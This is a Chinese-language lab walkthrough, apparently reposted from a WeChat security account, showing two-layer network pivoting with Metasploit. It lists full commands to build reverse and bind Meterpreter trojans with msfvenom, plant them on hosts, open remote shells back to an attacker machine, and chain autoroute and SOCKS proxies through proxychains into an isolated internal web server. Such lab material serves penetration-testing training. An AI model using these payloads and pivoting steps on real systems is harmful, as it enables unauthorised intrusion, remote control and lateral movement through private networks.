拓扑架构 :
kali : 192.168.57.129 (攻击机)
sqlserver : 192.168.57.150 192.168.3.32 (出网, 可以被kali 访问)
win7 : 192.168.3.25 192.168.188.1 (不出网, 只能被 sqlserver 访问)
webserver : 192.168.188.2 (不出网, 只能被 win7 访问)
实现直接从 kali 直接访问 webserver
说明:
先拿下 sqlserver 在这里开启第一层代理即可访问到 3.0 网段 , 即可以访问到 win7
然后拿下win7 在这里开启第二层代理即可访问到 188.0 网段 , 即可以访问到 webserver
通过这两层代理可以 kali 可以直接访问到 webs
MSF 生成反向木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.57.129 lport=6666 -f exe -o 6666.exe
MSF 配置监听木马
kali 输入 msfconsole 打开 MSF 控制台
配置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.57.129
set lport 6666
run
将木马投放 到sqlserver , 双击木马上线
成功接收木马回连
MSF 开启第一层代理
先配置路由
设置路由模块
run post/multi/manage/autoroute
查看路由情况
run autoroute -p
挂起当前 meterpreter
background
开启第一层代理
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1115
run
kali 机器配置代理实现直接访问 win7 , 利用的代理工具是 proxychains4
vi /usr/local/etc/proxychains.conf
成功实现对 3.25 win7 进行扫描
proxychains4 nmap -Pn -sT -p80 192.168.3.25
MSF 生成正向木马
实现kali 通过 sqlserver 直接连接 内网(不出网)win7
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=7777 -f exe > bind.exe
把木马投放到 win7
利用 MSF 正向连接上线 , 成功直接通过kali 上线 内网的 win7
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.25
set lport 7777
run
MSF 开启第二层代理
和第一层操作一样 ,先配置路由
设置路由模块
run post/multi/manage/autoroute
查看路由情况
run autoroute -p
挂起当前 meterpreter
background
开启第二层代理
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1116
run
配置代理工具实现 kali 直接访问不出网的 webserver 的web服务
vi /usr/local/etc/proxychains.conf
成功通过 kali 直接访问到 188.2 的web服务
proxychains4 curl -vv http://192.168.188.2
本公众号云息信安所提供的信息以及工具仅供安全测试人员用于授权测试,禁止用于未授权测试,请勿非法使用!!!造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号云息信安及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
原文始发于微信公众号(云息信安):MSF实现二层代理实验
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论